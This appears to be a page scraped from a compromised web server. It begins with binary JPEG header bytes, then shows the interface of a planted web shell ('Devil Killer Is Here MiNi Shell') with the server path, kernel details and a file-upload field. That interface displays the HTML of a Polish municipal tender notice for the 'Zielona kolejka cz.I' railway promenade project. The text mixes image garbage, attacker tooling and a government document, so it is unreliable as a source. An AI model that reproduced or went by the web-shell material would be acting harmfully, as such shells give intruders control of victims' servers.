JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250131/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250131/0008252201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Zielona kolejka cz.I” Część 1 – Roboty budowlane branży drogowej, elektrycznej i architektonicznej Część 2 – Zieleń zorganizowana </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Czarna Białostocka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050659036</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Torowa 14 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czarna Białostocka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">857131340</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@czarnabialostocka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip-umczarnabialostocka.wrotapodlasia.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zielona kolejka cz.I” Część 1 – Roboty budowlane branży drogowej, elektrycznej i architektonicznej Część 2 – Zieleń zorganizowana </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a93dea4f-b446-4428-bab7-de21dc3b88ef</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00082522</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00023193/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Zielona kolejka cz. I</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt uzyskał dofinansowanie inwestycji z: dofinansowaniem z Rządowego Programu Odbudowy Zabytków Polski Ład: Nr RPOZ/2022/3399/PolskiLad. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a93dea4f-b446-4428-bab7-de21dc3b88ef <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz<br/>poczty elektronicznej przetargi@czarnabialostocka.pl . Adres strony internetowej, na której będą udostępniane zmiany i wyjaśnienia<br/>SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia:<br/>https://bipum.czarnabialostocka.wrotapodlasia.pl w zakładce „Zamówienia publiczne&#34;</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl/ (dotyczy składania ofert), oraz pocz elektr: przetargi@czarnabialostocka.pl .<br/>2.Oferty/wnioski o dopuszczenie do udziału w postęp, zawiadomienia, wezwania, zadawanie pytań oraz ogólne informacje,Zamawiający i Wykonawcy przekazują powołując się nr ogłoszenia (BZP) lub nr refer postęp tj. Or.271.3.2025.<br/>3.Wykonawca zamierzający wziąć udział w postęp o udzielenie zamów publicz, musi posiadać konto podmiotu „Wykonawca” na P. e-Zamówienia.Wykonawca posiadający konto na P. e-Zamówienia ma dostęp do formu: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komun.<br/>4. Możliwość korzystania w postęp z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na P. e- Zamówienia oraz zalogowania się na P. e-Zamówienia. Do korzystania z „Formularza do komunikacji”służących do zadawania pytań dotyczących treści dokum zamów wystarczające jest posiadanie tzw. konta uproszczonego na P. e-Zamówieniach.<br/>Zamawiający wymaga aby komuni między zamawiającym a wykonawcami, w tym wszelkie oświad, wnioski, zawiadomienia oraz inform, przekazywane były w formie elektro.<br/>5. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z SWZ. 6. Wymagania techn i organizacyjne wysyłania i odbierania dokum elektron, elektron kopii dokum i oświadczeń oraz inform przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania<br/>z P. e-Zamówień. 7.Zamawiający przekazuje link do postęp oraz ID postępo jako inform do niniejszej SWZ. Dane postępow można wyszukać również ze strony głównej P. e-Zamówienia (przycisk „Przeglądaj postępowanie/konkurs”). 8. Za datę i godz przekazania oferty, wniosków, zawiadomień, dokum elektron, oświad lub elektron kopii dokum lub oświad oraz innych inform przyjmuje się datę ich przekazania na P. e-Zamówienia https://ezamowienia.gov.pl lub datę ich przekazania za pomocą pocz elektron z zastrzeżeniem, iż ofertę wraz z załącz określonymi w roz X. SWZ, pod rygorem odrzucenia oferty na podst art 226 ust.1 pkt6 Pzp, można przekazać wyłącznie na P. e-Zamówienia https://ezamowienia.gov.pl Dokum składane w formie elektron lub w postaci elektron muszą być opatrzone podp elektron, podp zaufanym lub podp osob (zgodnie z art. 63 ust. 2 Pzp). Ofertę, oświadczenia o których mowa w<br/>art.125 ust.1 Pzp., pśd, pełnomocnictwa sporządza się w postaci elektr, w ogólnie dostępnych formatach danych, w szczególności w formatach.txt,.rtf,.pdf,.doc,.docx,.odt. Zalecany przez Zamawiającego format danych - .pdf. 9. Komuni w postęp, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektro za pośrednictwem “Formularze”n(„Formularze do komunikacji”). Za pośred „Formularzy do komunikacji” odbywa się w szczególności przekazywanie<br/>wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komun umożliwiają również dołączenie załącz do przesyłania wiadomoś (przycisk „dodaj załącznik”). W przypadku załącz zamawiający dopuszcza również możliwość składania doku elektr za pomocą poczty elektr, na wskazany w pkt. 1 adres e-mail. Sposób sporządzania dok elektr musi być zgodny z<br/>wymaganiami określonymi w rozp MRPiT z dn 23.12.2020 r. w sprawie pśd oraz innych dokum lub oświad, jakich może żądać zamawiający od wykonawcy oraz rozp PRM z dn 30.12.2020 r. w sprawie sposobu sporządz i przekazyw inform oraz wymagań tech dla dokum elektro oraz środ komu elektron w postęp o udzielenie zamó publi lub konkursie. W zależności od rodzaju podpisu i jego<br/>typu (zewn i wewn) dodaje się do przesłanej wiadomości uprzednio podpisane dokum wraz z wygenerowanym plikiem podp (typ zewn) lub dokum z wszytym podp (typ wewnętrzny). Wszystkie wysłane i odebrane w postępo przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 roz Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27.04.2016 r. w sprochrony osób fiz w związku z przetwarzaniem dan osob i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne roz. o ochronie da¬nych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „Roz”, informuję, że:<br/>1.Admin Pani/Pana dan oso jest Gmina Cz B reprezentowana przez Burmistrza Cz B z siedzibą: ul. Torowa 14A, 16-020 Cz B,<br/>tel.:85 713 13 40, e-mail: um@czarnabialostocka.pl. 2.W sprawach z zakresu ochrony dan oso może się Pan/i kontaktować się z<br/>IOD pod adresem e-mail: iod@dbajodane.pl 3.Dane osobowe będą przetwarzane w celu związanym z postęp o udzielenie zp.<br/>4.Dane osob będą przechowywane przez okres zg. z art. 78 ust. 1 i 4 ust. z dnia z dnia 11.09.2019 r.– Pzp (Dz. U. z 2022 r. poz.<br/>1710 z<br/>późn. zm.)zwanej dalej PZP, przez okres 4 lat od dnia zak postępowania o udzielenie zam, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas obowiązywania umowy. 5.Podstawą prawną przetwarzania danych jest art. 6 ust. 1<br/>lit. c) ww. Roz w związku z przepisami PZP. 6.Odbiorcami Pan/i danych będą osoby lub podmioty, którym udostępniona zostanie dok<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 4 PZP. 7.Ob podania przez Pan/i danych osobowych bezpośrednio Pan/i<br/>dotyczących jest wymogiem ust określonym w przepisach PZP, związanym z udziałem w post o udzielenie zam publ; konsekwencje<br/>niepodania określonych danych wynikają z PZP. 8.Osoba, której dane dotyczą ma prawo do: dostępu do treści swoich danych oraz<br/>możliwości ich poprawiania, sprostowania, ograniczenia przetwarzania,w przypadku gdy przetw danych odbywa się z naruszeniem<br/>przep Roz służy prawo wniesienia skargi do organu nadzorczego tj. Prezesa UODO, ul. Stawki 2, 00-193 Wawa,9.Osobie, której<br/>dane dotyczą nie przysługuje: w związku z art. 17 ust. 3 lit. b, d lub e Roz prawo do usunięcia dan osob; prawo do przenoszenia dan<br/>osob, o którym mowa w art. 20 Roz;na podstawie art. 21 Roz prawo sprzeciwu, wobec przetwarzania dan osob. 10.W przypadku gdy<br/>wykonanie obow, o których mowa w art. 15 ust. 1-3 Roz, wymagałoby niewspółmiernie dużego wysiłku, Admin może żądać od<br/>osoby, której dane dotyczą, wskazania dodat inf mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>postępowania o udzielenie zam publ. 11.Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia dan oso, o którym mowa w art. 16 Roz, nie może skutkować zmianą wyniku postę o udzielenie zam publ lub konkursu<br/>ani zmianą post. umowy w zakresie niezgodnym z PZP. 12.Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Roz, nie<br/>ogranicza przetwarzania dan osobowych do czasu zakończenia postępowania o udzielenie zam publ. 13.W przypadku dan osob<br/>zamieszczonych przez Admin w BZP, prawa, o których mowa w art. 15 i art. 16 Roz, są wykonywane w drodze żądania<br/>skierowanego do Admin.14. Od dnia zakończenia postępowania o udzielenie zam, w przypadku gdy wniesienie żądania, o którym<br/>mowa w art. 18 ust. 1 Roz, spowoduje ograniczenie przetwarzania dan osob zawartych w protok i załą do protok, Admin nie<br/>udostępnia tych danych zawartych w protok i w zał do protok, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 Roz.<br/>15.W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Roz, wymagałoby niewspółmiernie dużego wysiłku,<br/>Admin może żądać od osoby, której dane dotyczą, wskazania dodatkowych inf mających w szczególności na celu sprecyzowanie<br/>nazwy lub daty zakończonego postępowania o udzielenie zam. 16.Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do<br/>sprostowania lub uzup, o którym mowa w art. 16 Roz, nie może naruszać integralności protok oraz jego zał. 17.Ponadto<br/>informujemy, iż w związku z przetwarzaniem Pan/i danych osobowych nie podlega Pan/i decyzjom, które się opierają wyłącznie na<br/>zautomatyzowanym przetwarzaniu, w tym profilowaniu, o czym stanowi art. 22 Ro</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Or.271.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy opis przedmiotu zamówienia, warunki i sposób jego realizacji stanowi Załącznik nr 1 do SWZ:<br/>Renowacja i rewitalizacja torowiska kolejki wąskotorowej oraz stworzenie wzdłuż torowiska promenady będącej zieloną<br/>przestrzenią publiczną i zagospodarowaniem terenów przyległych z elementami małej architektury, zielenią zorganizowaną<br/>wraz z oświetleniem terenu i monitoringiem wizyjnym w Czarnej Białostockiej w ramach zadania „Zielona kolejka cz. I”<br/>w postaci:<br/>Część 1 – Roboty budowlane branży drogowej, elektrycznej i architektonicznej,<br/>W ramach zadania należy wykonać renowację i rewitalizację torowiska kolejki wąskotorowej oraz stworzyć wzdłuż torowiska<br/>promenadę będącą zieloną przestrzenią publiczną wraz z zagospodarowaniem terenów przyległych, z elementami małej architektury, zielenią zorganizowaną oraz oświetleniem terenu i monitoringiem wizyjnym na dz. nr geod. 1067/20, 1067/18,<br/>1069/59, 1067/9 oraz 1066/6 w Czarnej Białostockiej w postaci:<br/>- Część 1 – Roboty budowlane branży drogowej, elektrycznej i architektonicznej<br/>A Roboty architektoniczno – budowlane i zieleni zorganizowanej:...<br/>B Roboty drogowe:...<br/>Do zadań Wykonawcy części 1 należy również:<br/>- wykonanie robót budowlano-montażowych renowacji i rewitalizacji torowiska kolejki wąskotorowej oraz stworzenie wzdłuż<br/>torowiska promenady będącej zieloną przestrzenią publiczną i zagospodarowaniem terenów przyległych z elementami małej<br/>architektury wraz z oświetleniem terenu i monitoringiem wizyjnym zgodnie z Dokumentacją Techniczną i uzgodnieniami z<br/>Inwestorem,<br/>- dostawę materiałów objętych projektem oraz innych niezbędnych do prawidłowego wykonania zamówienia,<br/>- demontaż wraz z utylizacją wszystkich materiałów z rozbiórki i powstałych w trakcie prowadzenia prac,<br/>- niwelację i wyrównanie terenu wraz z odtworzeniem naruszonych nawierzchni terenów przyległych oraz dokonaniem siewu<br/>mieszanek traw trawnikowych.<br/>- Wykonawca jest zobowiązany do wykonania własnym staraniem i na własny koszt:<br/>• zapewnienia kompletnej obsługi geodezyjnej oraz wykonanie powykonawczej inwentaryzacji geodezyjnej w wersji<br/>papierowej w liczbie 3 egzemplarzy i w wersji elektronicznej w formacie PDF,<br/>• sporządzenia planu Bezpieczeństwa i Ochrony Zdrowia (BIOZ) zgodnie z obowiązującymi przepisami w tym zakresie i<br/>przestrzegania jego postanowień,<br/>• opracowania i uzgodnienia czasowej organizacji ruchu o ile zajdzie konieczność,<br/>• wykonania wszelkich prób i sprawdzeń oraz przedstawienia dokumentacji w tym zakresie, w szczególności prób<br/>oświetlenia i monitoringu wizyjnego oraz zagęszczenia gruntu i odbudowy naruszonej nawierzchni terenów przyległych,<br/>• wywiezienia z terenu budowy i przekazania do zagospodarowania lub utylizacji wszystkich odpadów pochodzących z robót<br/>ziemnych i demontażowych zgodnie z obowiązującymi przepisami oraz przekazania Zamawiającemu odpowiedniej<br/>dokumentacji w tym zakresie, w tym kart przekazania odpadów,<br/>• zabezpieczenia terenu na czas prowadzenia robót, uporządkowania terenu budowy po zakończeniu robót oraz wykonania<br/>prac związanych z przywróceniem terenu do stanu pierwotnego,<br/>• zapewnienia mediów niezbędnych do prowadzenia robót,<br/>• zapewnienia materiałów niezbędnych do realizacji przedmiotu zamówienia.<br/>• zapewnia własnym staraniem i na swój koszt wszystkich narzędzi, sprzętu budowlanego oraz środków transportu<br/>niezbędnych do realizacji zadania,.<br/>1.Szczegółowy zakres robót zawierają projekty techniczne stanowiące Załączniki od nr 1.1 do 1.3 do SWZ. W przypadku<br/>stwierdzenia rozbieżności - rozstrzygające są zapisy w dokumentacji wykonawczej przed przedmiarem robót, a w ramach<br/>dokumentacji wykonawczej – rysunki, schematy montażowe i plan sytuacyjny przed zestawieniami materiałów.<br/>2. Poprzez równoważność Zamawiający rozumie zastosowanie takich materiałów, których parametry techniczne, jakościowe<br/>i technologiczne będą takie same lub lepsze od materiałów jakie zostały przyjęte w rozwiązaniach Dokumentacji<br/>Technicznej.<br/>3 Niezależnie od zgodności z parametrami technicznymi wyszczególnionymi w Dokumentacji Technicznej, zastosowanie<br/>materiałów i rozwiązań równoważnych musi zagwarantować realizację zamówienia w zgodzie z Przedmiotem Zamówienia<br/>opisanym w niniejszej SWZ.<br/>4 W przypadku oferowania rozwiązań równoważnych w stosunku do określonych w Dokumentacji Technicznej, Wykonawca<br/>zobowiązany jest wykazać na etapie składania ofert, że oferowane przez niego dostawy, usługi lub roboty budowlane<br/>spełniają wymagania określone przez Zamawiającego, załączając odpowiednie dokumenty do oferty potwierdzające<br/>spełnienie wymagań określonych przez Zamawiającego.<br/>5. Zamawiający wymaga udzielenia gwarancji na realizację zamówienia, na okres 60 miesięcy od dnia końcowego odbioru<br/>robót.<br/>Ponad to:<br/>- zniszczone podczas realizacji punkty graniczne należy na nowo wznowić i trwale za stabilizować, z tej czynności<br/>sporządzić protokół wymagany prawem w zakresie podziałów nieruchomości,<br/>- Zamawiający przewiduje etapowe (nie częściej niż raz na kwartał) rozliczenie robót uzależniając płatność za konkretny<br/>etap realizacji robót zgodny z przedstawionym i zaakceptowanym harmonogramem rzeczowo-finansowym, ich faktycznym<br/>wykonaniem potwierdzonym przez Inspektorów nadzoru inwestorskiego, pisemnym zgłoszeniem zakończenia etapu robót<br/>złożonym Zamawiającemu oraz po protokolarnym potwierdzeniu tego faktu,<br/>- W przypadku wykonywania robót części 1 i części 2 przez różnych wykonawców. Harmonogram rzeczowo-finansowy<br/>przedkładany przez Wykonawcę części 1 powinien być uzgodniony z Wykonawca części 2 a harmonogramem przedkładany<br/>przez Wykonawcę części 2 powinien być uzgodniony z Wykonawca części 1.<br/>- Zamawiający informuje, że koszty związane z poborem energii elektrycznej, energii cieplnej, wody oraz zabezpieczeniem<br/>sanitarnym ponosi Wykonawca w oparciu o odrębne umowy z gestorami sieci bądź ze specjalistycznymi firmami<br/>realizującymi takie usługi,<br/>- złożenie przed podpisaniem umowy kosztorysu ofertowego a po wykonaniu zadania kosztorysu powykonawczego,<br/>- dostawa i montaż 2 szt. tablic informacyjno – promocyjnych związanych z realizacją zadania wskazujących źródło<br/>pochodzenia środków pomocowych na jego realizację o wymiarach 120x180 cm (wzór tablicy informacyjno – promocyjnej<br/>zostanie przedstawiony przez Zamawiającego po podpisaniu umowy z Wykonawcą zadania).<br/>Inwestycję należy wycenić i wykonać zgodnie z dokumentacją projektową, stanowiącą załączniki nr 1.1 do 1,5 oraz nr 3.1do<br/>3.3 do SWZ i przedmiarami robót (załączniki nr 2.1 do 2.3 do SWZ) które są jedynie elementem pomocniczym do<br/>przygotowania oferty. Zamawiający zgodnie z art. 101 ust. 4 prawa zamówień publicznych informuje, że ilekroć w dokumentacji zamówienia<br/>wskazane zostały normy, oceny techniczne, specyfikacje techniczne i systemy referencji technicznych dopuszcza się<br/>również rozwiązania równoważne z opisywanymi w powyższych dokumentach. Tym samym do wymaganych cech<br/>materiału, produktu lub usługi, dopuszczalne są rozwiązania wskazane w tych dokumentach „ lub równoważne”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45233253-7 - Roboty w zakresie nawierzchni dróg dla pieszych</p> <p class="mb-0">45232451-8 - Roboty odwadniające i nawierzchniowe</p> <p class="mb-0">45233162-2 - Roboty budowlane w zakresie ścieżek rowerowych</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">43325000-7 - Wyposażenie parków i placów zabaw</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 